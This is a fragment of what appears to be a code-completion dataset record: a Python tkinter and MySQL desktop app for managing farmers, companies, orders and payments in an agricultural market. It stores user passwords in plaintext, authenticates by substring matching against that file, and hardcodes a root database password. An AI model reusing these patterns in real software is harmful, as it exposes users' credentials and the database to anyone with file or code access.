font=('Times new roman', 15),\n bg='white')\n label.place(x=350, y=10)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=\n entity_page)\n Button.place(x=10, y=50)\n Button = tk.Button(root, text='Insert', font=('Arial', 15), command=\n insert_ord)\n Button.place(x=110, y=50)\n Button = tk.Button(root, text='Delete', font=('Arial', 15), command=\n delete_ord)\n Button.place(x=210, y=50)\n Button = tk.Button(root, text='Update', font=('Arial', 15), command=\n update_ord)\n Button.place(x=310, y=50)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=\n search_ord)\n Button.place(x=410, y=50)\n view_ord()\n\n\ndef view_ord():\n frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')\n frame.place(x=10, y=100, width=750, height=400)\n x_scroll = Scrollbar(frame, orient=HORIZONTAL)\n y_scroll = Scrollbar(frame, orient=VERTICAL)\n table = ttk.Treeview(frame, columns=('or_id', 'or_date', 'or_fid',\n 'or_formula', 'or_to'), xscrollcommand=x_scroll.set, yscrollcommand\n =y_scroll.set)\n x_scroll.pack(side=BOTTOM, fill=X)\n y_scroll.pack(side=RIGHT, fill=Y)\n x_scroll.config(command=table.xview)\n y_scroll.config(command=table.yview)\n table.heading('or_id', text='Order Id')\n table.heading('or_date', text='Order Date')\n table.heading('or_fid', text='Ordered Farmer Id')\n table.heading('or_formula', text='Order (item)formula')\n table.heading('or_to', text='Order to')\n table['show'] = 'headings'\n table.pack()\n cur.execute('SELECT * FROM orders;')\n data = cur.fetchall()\n db.commit()\n if len(data) != 0:\n for row in data:\n table.insert('', END, values=row)\n\n\n<mask token>\n\n\ndef insert_ord():\n global e1, e2, e3, e4, e5, e6\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Order Id', font=('Times new roman', 20), bg=\n 'white')\n label.place(x=50, y=10)\n label = Label(root, text='Order date', font=('Times new roman', 20), bg\n ='white')\n 
label.place(x=50, y=60)\n label = Label(root, text='Order FID', font=('Times new roman', 20), bg=\n 'white')\n label.place(x=50, y=110)\n label = Label(root, text='Order formula', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=160)\n label = Label(root, text='Order to', font=('Times new roman', 20), bg=\n 'white')\n label.place(x=50, y=210)\n e1 = Entry(root, width=50)\n e2 = Entry(root, width=50)\n e3 = Entry(root, width=50)\n e4 = Entry(root, width=50)\n e5 = Entry(root, width=50)\n e1.place(x=350, y=10)\n e2.place(x=350, y=60)\n e2.insert(0, datetime.now())\n e3.place(x=350, y=110)\n e4.place(x=350, y=160)\n e5.place(x=350, y=210)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=orders)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n insert_ord_command)\n Button.place(x=400, y=400)\n\n\ndef insert_ord_command():\n try:\n sql = 'INSERT INTO orders values(%s,%s,%s,%s,%s);'\n vals = e1.get(), e2.get(), e3.get(), e4.get(), e5.get()\n cur.executemany(sql, [vals])\n db.commit()\n orders()\n except:\n insert_ord()\n\n\ndef delete_ord():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Order Id:', font=('Times new roman', 20), bg=\n 'tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=orders)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n delete_ord_command)\n Button.place(x=400, y=400)\n\n\ndef delete_ord_command():\n try:\n sql = 'DELETE FROM orders WHERE or_id=%s;'\n cur.execute(sql, [e1.get()])\n db.commit()\n orders()\n except:\n l = Label(root, text='Invalid Entry', font=('times new roman', 15))\n l.place(x=100, y=300)\n\n\ndef update_ord():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 
500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Order Id:', font=('Times new roman', 20), bg=\n 'tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='OK', font=('Arial', 15), command=update_or)\n Button.place(x=300, y=400)\n\n\ndef update_or():\n try:\n global e1, e2, e3, e4, e5, e6\n label = Label(root, text=' ' * 800, font=('Times new roman', 500),\n bg='tomato')\n label.place(x=0, y=0)\n sql = 'SELECT * FROM orders WHERE or_id=%s;'\n vals = [e1.get()]\n cur.execute(sql, vals)\n label = Label(root, text='Order Id', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=10)\n label = Label(root, text='Order Date', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=60)\n label = Label(root, text='Order f_id', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=110)\n label = Label(root, text='Order formula', font=('Times new roman', \n 20), bg='white')\n label.place(x=50, y=160)\n label = Label(root, text='Order to', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=210)\n e1 = Entry(root)\n e2 = Entry(root)\n e3 = Entry(root)\n e4 = Entry(root)\n e5 = Entry(root)\n data = cur.fetchall()\n arr = [e1, e2, e3, e4, e5, e6]\n count = 0\n for val in data[0]:\n arr[count].insert(0, val)\n count += 1\n e1.place(x=350, y=10)\n e2.place(x=350, y=60)\n e3.place(x=350, y=110)\n e4.place(x=350, y=160)\n e5.place(x=350, y=210)\n label = Button(root, text='Modify', font=('Times new roman', 20),\n bg='blue', command=update_command_ord)\n label.place(x=300, y=400)\n except:\n l = Label(root, text='Invalid Order_id', font=('times new roman', 15))\n l.place(x=100, y=300)\n update_ord()\n\n\ndef update_command_ord():\n sql = (\n 'UPDATE orders SET or_date=%s,or_fid=%s,or_formula=%s,or_to=%s WHERE or_id=%s;'\n )\n vals = e2.get(), e3.get(), e4.get(), e5.get(), e1.get()\n cur.executemany(sql, [vals])\n db.commit()\n orders()\n\n\ndef 
search_ord():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Order Id:', font=('Times new roman', 20), bg=\n 'tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=orders)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=\n search_or)\n Button.place(x=400, y=400)\n\n\ndef search_or():\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n try:\n sql = 'SELECT * FROM orders WHERE or_id=%s;'\n val = [e1.get()]\n cur.execute(sql, val)\n Button = tk.Button(root, text='OK', font=('Arial', 15), command=orders)\n Button.place(x=300, y=400)\n for val in cur:\n count = 0\n Y = 50\n names = ['order Id: ', 'Order date: ', 'Order fid: ',\n 'Order formula: ', 'order to: ']\n for i in val:\n label = Label(root, text=names[count] + str(i), font=(\n 'Times new roman', 20), bg='tomato')\n label.place(x=10, y=Y)\n Y += 50\n count += 1\n db.commit()\n except:\n l = Label(root, text='Invalid order id', font=('times new roman', 15))\n l.place(x=100, y=300)\n search_ord()\n\n\ndef payment():\n global root\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Payment Table', font=('Times new roman', 15),\n bg='white')\n label.place(x=350, y=10)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=\n entity_page)\n Button.place(x=10, y=50)\n Button = tk.Button(root, text='Insert', font=('Arial', 15), command=\n insert_pay)\n Button.place(x=110, y=50)\n Button = tk.Button(root, text='Delete', font=('Arial', 15), command=\n delete_pay)\n Button.place(x=210, y=50)\n Button = tk.Button(root, text='Update', font=('Arial', 15), command=\n update_pay)\n Button.place(x=310, y=50)\n Button = 
tk.Button(root, text='Search', font=('Arial', 15), command=\n search_pay)\n Button.place(x=410, y=50)\n view_pay()\n\n\ndef view_pay():\n frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')\n frame.place(x=10, y=100, width=750, height=400)\n x_scroll = Scrollbar(frame, orient=HORIZONTAL)\n y_scroll = Scrollbar(frame, orient=VERTICAL)\n table = ttk.Treeview(frame, columns=('trans_id', 'p_f_id', 'p_date',\n 'p_amount', 'p_method'), xscrollcommand=x_scroll.set,\n yscrollcommand=y_scroll.set)\n x_scroll.pack(side=BOTTOM, fill=X)\n y_scroll.pack(side=RIGHT, fill=Y)\n x_scroll.config(command=table.xview)\n y_scroll.config(command=table.yview)\n table.heading('trans_id', text='Transaction Id')\n table.heading('p_f_id', text='Farmer Id')\n table.heading('p_date', text='Payment Date')\n table.heading('p_amount', text='Amount')\n table.heading('p_method', text='Payment Method')\n table['show'] = 'headings'\n table.pack()\n cur.execute('SELECT * FROM payment;')\n data = cur.fetchall()\n db.commit()\n if len(data) != 0:\n for row in data:\n table.insert('', END, values=row)\n\n\n<mask token>\n\n\ndef insert_pay():\n global e1, e2, e3, e4, e5, e6\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Transaction Id', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=10)\n label = Label(root, text='Transaction farmer id', font=(\n 'Times new roman', 20), bg='white')\n label.place(x=50, y=60)\n label = Label(root, text='Transaction date', font=('Times new roman', \n 20), bg='white')\n label.place(x=50, y=110)\n label = Label(root, text='Transaction amount', font=('Times new roman',\n 20), bg='white')\n label.place(x=50, y=160)\n label = Label(root, text='Transaction method', font=('Times new roman',\n 20), bg='white')\n label.place(x=50, y=210)\n e1 = Entry(root, width=50)\n e2 = Entry(root, width=50)\n e3 = Entry(root, width=50)\n e4 = Entry(root, width=50)\n e5 = Entry(root, 
width=50)\n e1.place(x=350, y=10)\n e2.place(x=350, y=60)\n e3.place(x=350, y=110)\n e3.insert(0, datetime.now())\n e4.place(x=350, y=160)\n e5 = StringVar(root)\n e5.set('Debit card')\n w = OptionMenu(root, e5, 'Credit Card', 'UPI', 'Cheque', 'Cash')\n w.place(x=350, y=210)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=payment)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n insert_pay_command)\n Button.place(x=400, y=400)\n\n\ndef insert_pay_command():\n try:\n sql = 'INSERT INTO payment values(%s,%s,%s,%s,%s);'\n vals = e1.get(), e2.get(), e3.get(), e4.get(), e5.get()\n cur.executemany(sql, [vals])\n db.commit()\n payment()\n except:\n insert_pay()\n\n\ndef delete_pay():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Transaction Id:', font=('Times new roman', 20\n ), bg='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=payment)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n delete_pay_command)\n Button.place(x=400, y=400)\n\n\ndef delete_pay_command():\n try:\n sql = 'DELETE FROM payment WHERE trans_id=%s;'\n cur.execute(sql, [e1.get()])\n db.commit()\n payment()\n except:\n l = Label(root, text='Invalid Entry', font=('times new roman', 15))\n l.place(x=100, y=300)\n\n\n<mask token>\n\n\ndef search_pay():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Transaction Id:', font=('Times new roman', 20\n ), bg='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=payment)\n Button.place(x=200, y=400)\n Button = tk.Button(root, 
text='Search', font=('Arial', 15), command=\n search_pa)\n Button.place(x=400, y=400)\n\n\n<mask token>\n",
"step-5": "#! /usr/bin/python3\nimport pprint\nimport tkinter as tk\nfrom tkinter import messagebox\nfrom PIL import Image\nfrom tkinter import *\nfrom prettytable import PrettyTable\nimport ttk\nimport os\nimport subprocess\nimport mysql.connector\nfrom datetime import datetime\nimport time\n\n\ndb=mysql.connector.connect(host='localhost',user='root',passwd='PASSWORD',database='DATABASENAME')\ncur=db.cursor()\n\n\nroot=Tk()\nroot.title(\"WELCOME TO AGRI MARKET\")\n\n#stored procedure\n\"\"\"\n DELIMITER $$\n \n CREATE PROCEDURE getMonth(\n IN month VARCHAR(2))\n BEGIN\n SELECT * FROM payment\n WHERE p_date LIKE CONCAT('____-',month,'%');\n END$$\n\n DELIMITER ;\n\n\"\"\"\n\nT1,T2,T3=0,0,0\ndef First_page(root):\n global T1,T2,T3\n frame=Frame(root,height=500,width=800,bg='ivory')\n frame.pack()\n\n label=Label(root,text='WELCOME TO AGRI MARKET',font=('Times new roman',25))\n label.place(x=200,y=50)\n\n button=Button(root,text='LogIn',font=('times new roman',20),command=check_pass,bg='green')\n button.place(x=350,y=350)\n\n L1 = tk.Label(root, text=\"Username\", font=(\"Arial Bold\", 15), bg='ivory')\n L1.place(x=150, y=200)\n T1 = tk.Entry(root, width = 30, bd = 5)\n T1.place(x=280, y=200)\n\n L2 = tk.Label(root, text=\"Password\", font=(\"Arial Bold\", 15), bg='ivory')\n L2.place(x=150, y=250)\n T2 = tk.Entry(root, width = 30, show='*', bd = 5)\n T2.place(x=280, y=250)\n\n reg_button=Button(root,text='Register',font=(\"Arial Bold\",15),bg='blue',command=create_pass)\n reg_button.place(x=340,y=400)\n\ndef check_pass():\n global root,T1,T2,T3\n try:\n with open('password.txt','r')as f:\n lines=f.read()\n if T1.get()+'='+T2.get() in lines and T1.get()!='' and T2.get()!='':\n entity_page()\n else:\n label=Label(root,text='Invalid username or password.Try again',font=('times new roman',15))\n label.place(x=200,y=100)\n except:\n label=Label(root,text='Invalid username or password.Try again',font=('times new roman',15))\n label.place(x=200,y=100)\n\ndef 
create_pass():\n global root,T1,T2,T3\n\n\n #to clean up previous window\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='ivory')\n label.place(x=0,y=0)\n\n\n #this window\n L1 = tk.Label(root, text=\"Username\", font=(\"Arial Bold\", 15), bg='ivory')\n L1.place(x=150, y=200)\n T1 = tk.Entry(root, width = 30, bd = 5)\n T1.place(x=380, y=200)\n\n L2 = tk.Label(root, text=\"Password\", font=(\"Arial Bold\", 15), bg='ivory')\n L2.place(x=150, y=250)\n T2 = tk.Entry(root, width = 30, show='*', bd = 5)\n T2.place(x=380, y=250)\n\n L2 = tk.Label(root, text=\"Confirm Password\", font=(\"Arial Bold\", 15), bg='ivory')\n L2.place(x=150, y=300)\n T3 = tk.Entry(root, width = 30, show='*', bd = 5)\n T3.place(x=380, y=300)\n\n reg_button=Button(root,text='Done',font=(\"Arial Bold\",15),bg='blue',command=add_pass)\n reg_button.place(x=440,y=400)\n\n\ndef add_pass():\n global root,T1,T2,T3\n\n if T2.get()!=T3.get():\n label=Label(root,text='Incorrect Password. Enter again',font=('times new roman',20))\n label.place(x=100,y=100)\n else:\n try:\n with open('password.txt','r')as f:\n data=f.read()\n with open('password.txt','w')as f:\n f.write(data+'\\n')\n f.write(T1.get()+'='+T2.get())\n\n entity_page()\n except:\n with open('password.txt','w')as f:\n f.write(T1.get()+'='+T2.get())\n\n entity_page()\n\ndef entity_page():\n global root\n #cleaning previous window\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='ivory')\n label.place(x=0,y=0)\n\n #this window\n label=Label(root,text='WELCOME TO AGRI MARKET ',font=('Times new roman',20),bg='blue')\n label.place(x=200,y=20)\n\n label=Label(root,text='Choose the Entity ',font=('Times new roman',20),bg='white')\n label.place(x=250,y=100)\n\n\n Button = tk.Button(root, text=\"Farmers\", font=(\"Arial\", 15),command=farmer)\n Button.place(x=100, y=150+25)\n\n Button = tk.Button(root, text=\"Company\", font=(\"Arial\", 15),command=company)\n Button.place(x=300, y=150+25)\n\n Button = tk.Button(root, 
text=\"Fertilizer\", font=(\"Arial\", 15),command=fertilizer)\n Button.place(x=500, y=150+25)\n\n Button = tk.Button(root, text=\"Order\", font=(\"Arial\", 15),command=orders)\n Button.place(x=200, y=300+25)\n\n Button = tk.Button(root, text=\"Payment\", font=(\"Arial\", 15),command=payment)\n Button.place(x=400, y=300+25)\n\n Button = tk.Button(root, text=\"GET BOOKING HISTORY\", font=(\"Arial\", 15),command=history)\n Button.place(x=200, y=400+25)\n\n#history\ndef history():\n global root,cur,db\n #clean previous window\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n\n cur.execute(\"CALL getMonth(%s);\",[datetime.today().strftime(\"%m\")])\n data=cur.fetchall()\n \n label=Label(root,text=\"The Transaction History of this month\",font=(\"Arial\",15))\n label.place(x=200,y=20)\n\n button=Button(root,text='BACK',command=entity_page)\n button.place(x=20,y=20)\n\n frame=Frame(root,bd=5,relief=RIDGE,bg='tomato')\n frame.place(x=10,y=100,width=750,height=400)\n\n x_scroll=Scrollbar(frame,orient=HORIZONTAL)\n y_scroll=Scrollbar(frame,orient=VERTICAL)\n\n table=ttk.Treeview(frame,columns=(\"trans_id\",'p_f_id','p_date','p_amount','p_method'),xscrollcommand=x_scroll.set,\n yscrollcommand=y_scroll.set)\n\n x_scroll.pack(side=BOTTOM,fill=X)\n y_scroll.pack(side=RIGHT,fill=Y)\n x_scroll.config(command=table.xview)\n y_scroll.config(command=table.yview)\n table.heading('trans_id',text=\"Transaction Id\")\n table.heading('p_f_id',text=\"Farmer Id\")\n\n\n table.heading('p_date',text=\"Payment Date\")\n table.heading('p_amount',text=\"Amount\")\n table.heading('p_method',text=\"Payment Method\")\n #table.heading('f_address',text=\"Farmer Address\")\n table['show']='headings'\n\n #table.column(\"f_id\",width=100)\n\n\n table.pack()\n\n\n\n #cur.execute(\"SELECT * FROM payment;\")\n\n #data =cur.fetchall()\n #db.commit()\n if len(data)!=0:\n for row in data:\n table.insert('',END,values=row)\n\n db.close()\n 
db=mysql.connector.connect(host='localhost',user='root',passwd='bhushi',database='farmer_app')\n cur=db.cursor()\n \n\n\n#farmer page\ndef farmer():\n global root\n #clean previous window\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n #window\n label=Label(root,text='Farmer Table',font=('Times new roman',15),bg='white')\n label.place(x=350,y=10)\n\n Button = tk.Button(root, text=\"Back\", font=(\"Arial\", 15),command=entity_page)\n Button.place(x=10, y=50)\n\n Button = tk.Button(root, text=\"Insert\", font=(\"Arial\", 15),command=insert_farmer)\n Button.place(x=110, y=50)\n\n Button = tk.Button(root, text=\"Delete\", font=(\"Arial\", 15),command=delete_farmer)\n Button.place(x=210, y=50)\n\n Button = tk.Button(root, text=\"Update\", font=(\"Arial\", 15),command=update_farmer)\n Button.place(x=310, y=50)\n\n Button = tk.Button(root, text=\"Search\", font=(\"Arial\", 15),command=search_farmer)\n Button.place(x=410, y=50)\n\n view_farmer()\n\n\ndef view_farmer():\n frame=Frame(root,bd=5,relief=RIDGE,bg='tomato')\n frame.place(x=10,y=100,width=750,height=400)\n\n x_scroll=Scrollbar(frame,orient=HORIZONTAL)\n y_scroll=Scrollbar(frame,orient=VERTICAL)\n\n table=ttk.Treeview(frame,columns=(\"f_id\",'f_name','f_phone','f_mail','f_locality','f_address'),xscrollcommand=x_scroll.set,\n yscrollcommand=y_scroll.set)\n\n x_scroll.pack(side=BOTTOM,fill=X)\n y_scroll.pack(side=RIGHT,fill=Y)\n x_scroll.config(command=table.xview)\n y_scroll.config(command=table.yview)\n table.heading('f_id',text=\"Farmer Id\")\n table.heading('f_name',text=\"Farmer Name\")\n table.heading('f_phone',text=\"Farmer Phone\")\n table.heading('f_mail',text=\"Farmer Mail\")\n table.heading('f_locality',text=\"Farmer Locality\")\n table.heading('f_address',text=\"Farmer Address\")\n table['show']='headings'\n\n table.column(\"f_id\",width=100)\n\n\n table.pack()\n\n\n\n cur.execute(\"SELECT * FROM farmer;\")\n\n data =cur.fetchall()\n db.commit()\n if 
len(data)!=0:\n for row in data:\n table.insert('',END,values=row)\n\ne1,e2,e3,e4,e5,e6=0,0,0,0,0,0\ndef insert_farmer():\n global e1,e2,e3,e4,e5,e6\n #clean the window\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n\n #create the window\n label=Label(root,text='Farmer_id',font=('Times new roman',20),bg='white')\n label.place(x=50,y=10)\n\n label=Label(root,text='Farmer_name',font=('Times new roman',20),bg='white')\n label.place(x=50,y=60)\n\n label=Label(root,text='Farmer_phone',font=('Times new roman',20),bg='white')\n label.place(x=50,y=110)\n\n label=Label(root,text='Farmer_mail',font=('Times new roman',20),bg='white')\n label.place(x=50,y=160)\n\n label=Label(root,text='Farmer_locality',font=('Times new roman',20),bg='white')\n label.place(x=50,y=210)\n\n label=Label(root,text='Farmer_address',font=('Times new roman',20),bg='white')\n label.place(x=50,y=270)\n\n e1=Entry(root,width=50)\n e2=Entry(root,width=50)\n e3=Entry(root,width=50)\n e4=Entry(root,width=50)\n e5=Entry(root,width=50)\n e6=Entry(root,width=50)\n\n e1.place(x=350,y=10)\n e2.place(x=350,y=60)\n e3.place(x=350,y=110)\n e4.place(x=350,y=160)\n e5.place(x=350,y=210)\n e6.place(x=350,y=270)\n\n Button = tk.Button(root, text=\"Back\", font=(\"Arial\", 15),command=farmer)\n Button.place(x=200, y=400)\n\n Button = tk.Button(root, text=\"Commit\", font=(\"Arial\", 15),command=insert_farmer_command)\n Button.place(x=400, y=400)\n\ndef insert_farmer_command():\n global root\n try:\n sql=\"INSERT INTO farmer values(%s,%s,%s,%s,%s,%s);\"\n if len(e1.get())>3:\n invalid('farmer')\n else:\n\n vals=e1.get(),e2.get(),e3.get(),e4.get(),e5.get(),e6.get()\n cur.executemany(sql,[vals])\n db.commit()\n farmer()\n except:\n insert_farmer()\ndef invalid(page):\n #clean\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n if page=='farmer':\n label=Label(root,text='Enter valid farmer_id',font=('Times new 
roman',30),bg='white')\n label.place(x=170,y=200)\n\n button=Button(root,text='Re-enter',font=('Times new roman',20),command=insert_farmer)\n button.place(x=300,y=400)\n elif page=='company':\n label=Label(root,text='Enter valid company_id',font=('Times new roman',30),bg='white')\n label.place(x=170,y=200)\n\n button=Button(root,text='Re-enter',font=('Times new roman',20),command=insert_company)\n button.place(x=300,y=400)\ndef delete_farmer():\n global e1\n #clean\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n #window\n label=Label(root,text='Farmer Id:',font=('Times new roman',20),bg='tomato')\n label.place(x=100,y=200)\n\n e1=Entry(root,width=50)\n e1.place(x=300,y=200)\n\n Button = tk.Button(root, text=\"Back\", font=(\"Arial\", 15),command=farmer)\n Button.place(x=200, y=400)\n\n Button = tk.Button(root, text=\"Commit\", font=(\"Arial\", 15),command=delete_farmer_command)\n Button.place(x=400, y=400)\n\n\ndef delete_farmer_command():\n try:\n sql=\"DELETE FROM farmer WHERE f_id=%s;\"\n cur.execute(sql,[e1.get()])\n db.commit()\n farmer()\n except:\n l=Label(root,text='Invalid Entry',font=('times new roman',15))\n l.place(x=100,y=300)\n\ndef update_farmer():\n global e1\n #clean\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n #window\n label=Label(root,text='Farmer Id:',font=('Times new roman',20),bg='tomato')\n label.place(x=100,y=200)\n\n e1=Entry(root,width=50)\n e1.place(x=300,y=200)\n\n Button = tk.Button(root, text=\"OK\", font=(\"Arial\", 15),command=update)\n\n Button.place(x=300, y=400)\n\ndef update():\n try:\n global e1,e2,e3,e4,e5,e6\n #clean\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n sql='SELECT * FROM farmer WHERE f_id=%s;'\n vals=[e1.get()]\n cur.execute(sql,vals)\n\n label=Label(root,text='Farmer_id',font=('Times new roman',20),bg='white')\n label.place(x=50,y=10)\n\n 
label=Label(root,text='Farmer_name',font=('Times new roman',20),bg='white')\n label.place(x=50,y=60)\n\n label=Label(root,text='Farmer_phone',font=('Times new roman',20),bg='white')\n label.place(x=50,y=110)\n\n label=Label(root,text='Farmer_mail',font=('Times new roman',20),bg='white')\n label.place(x=50,y=160)\n\n label=Label(root,text='Farmer_locality',font=('Times new roman',20),bg='white')\n label.place(x=50,y=210)\n\n label=Label(root,text='Farmer_address',font=('Times new roman',20),bg='white')\n label.place(x=50,y=270)\n\n e1=Entry(root)\n e2=Entry(root)\n e3=Entry(root)\n e4=Entry(root)\n e5=Entry(root)\n e6=Entry(root)\n\n data=cur.fetchall()\n arr=[e1,e2,e3,e4,e5,e6]\n count=0\n for val in data[0]:\n arr[count].insert(0,val)\n count+=1\n\n e1.place(x=350,y=10)\n e2.place(x=350,y=60)\n e3.place(x=350,y=110)\n e4.place(x=350,y=160)\n e5.place(x=350,y=210)\n e6.place(x=350,y=270)\n\n label=Button(root,text='Modify',font=('Times new roman',20),bg='blue',command=update_command)\n label.place(x=300,y=400)\n\n\n except:\n l=Label(root,text='Invalid Farmer_id',font=('times new roman',15))\n l.place(x=100,y=300)\n update_farmer()\n\ndef update_command():\n try:\n sql=\"UPDATE farmer SET f_name=%s,f_phone_no=%s,f_mail=%s,f_locality=%s,f_address=%s WHERE f_id=%s;\"\n vals=e2.get(),e3.get(),e4.get(),e5.get(),e6.get(),e1.get()\n cur.executemany(sql,[vals])\n db.commit()\n farmer()\n except:\n update_farmer()\ndef search_farmer():\n global e1\n #clean\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n #window\n label=Label(root,text='Farmer Id:',font=('Times new roman',20),bg='tomato')\n label.place(x=100,y=200)\n\n e1=Entry(root,width=50)\n e1.place(x=300,y=200)\n\n Button = tk.Button(root, text=\"Back\", font=(\"Arial\", 15),command=farmer)\n Button.place(x=200, y=400)\n\n Button = tk.Button(root, text=\"Search\", font=(\"Arial\", 15),command=search)\n Button.place(x=400, y=400)\ndef search():\n #clean\n 
label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n try:\n sql='SELECT * FROM farmer WHERE f_id=%s;'\n val=[e1.get()]\n cur.execute(sql,val)\n\n Button = tk.Button(root, text=\"OK\", font=(\"Arial\", 15),command=farmer)\n Button.place(x=300, y=400)\n\n for val in cur:\n count=0\n Y=50\n names=['farmer id: ','farmer name: ','farmer phone: ','farmer mail: ','farmer locality: ','farmer address: ']\n for i in val:\n label=Label(root,text=names[count]+str(i),font=('Times new roman',20),bg='tomato')\n label.place(x=10,y=Y)\n Y+=50\n count+=1\n db.commit()\n except:\n l=Label(root,text='Invalid Farmer Id',font=('times new roman',15))\n l.place(x=100,y=300)\n search_farmer()\n\n\n#company page\ndef company():\n global root\n #clean previous window\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n #window\n label=Label(root,text='Company Table',font=('Times new roman',15),bg='white')\n label.place(x=350,y=10)\n\n Button = tk.Button(root, text=\"Back\", font=(\"Arial\", 15),command=entity_page)\n Button.place(x=10, y=50)\n\n Button = tk.Button(root, text=\"Insert\", font=(\"Arial\", 15),command=insert_company)\n Button.place(x=110, y=50)\n\n Button = tk.Button(root, text=\"Delete\", font=(\"Arial\", 15),command=delete_company)\n Button.place(x=210, y=50)\n\n Button = tk.Button(root, text=\"Update\", font=(\"Arial\", 15),command=update_company)\n Button.place(x=310, y=50)\n\n Button = tk.Button(root, text=\"Search\", font=(\"Arial\", 15),command=search_company)\n Button.place(x=410, y=50)\n\n view_company()\n\n\ndef view_company():\n frame=Frame(root,bd=5,relief=RIDGE,bg='tomato')\n frame.place(x=10,y=100,width=750,height=400)\n\n x_scroll=Scrollbar(frame,orient=HORIZONTAL)\n y_scroll=Scrollbar(frame,orient=VERTICAL)\n\n table=ttk.Treeview(frame,columns=(\"c_id\",'c_name','c_address'),xscrollcommand=x_scroll.set,\n yscrollcommand=y_scroll.set)\n\n 
x_scroll.pack(side=BOTTOM,fill=X)\n y_scroll.pack(side=RIGHT,fill=Y)\n x_scroll.config(command=table.xview)\n y_scroll.config(command=table.yview)\n table.heading('c_id',text=\"Company Id\")\n table.heading('c_name',text=\"Company Name\")\n table.heading('c_address',text=\"Company Address\")\n table['show']='headings'\n\n table.column(\"c_id\",width=100)\n\n\n table.pack()\n\n\n\n cur.execute(\"SELECT * FROM company;\")\n\n data =cur.fetchall()\n db.commit()\n if len(data)!=0:\n for row in data:\n table.insert('',END,values=row)\n\ndef insert_company():\n global e1,e2,e3,e4,e5,e6\n #clean the window\n label=Label(root,text=' '*800,font=('Times new roman',500),bg='tomato')\n label.place(x=0,y=0)\n\n\n #create the window\n label=Label(root,text='Company_id',font=('Times new roman',20),bg='white')\n label.place(x=50,y=10)\n\n label=Label(root,text='Company_name',font=('Times new roman',20),bg='white')\n label.place(x=50,y=110)\n\n label=Label(root,text='Company_address',font=('Times new roman',20),bg='white')\n label.place(x=50,y=210)\n\n e1=Entry(root,width=50)\n e2=Entry(root,width=50)\n e3=Entry(root,width=50)\n\n e1.place(x=350,y=10)\n e2.place(x=350,y=110)\n e3.place(x=350,y=210)\n\n Button = tk.Button(root, text=\"Back\", font=(\"Arial\", 15),command=company)\n Button.place(x=200, y=400)\n\n Button = tk.Button(root, text=\"Commit\", font=(\"Arial\", 15),command=insert_company_command)\n Button.place(x=400, y=400)\n\ndef insert_company_command():\n try:\n if len(e1.get())>3:\n invalid(\"company\")\n else:\n 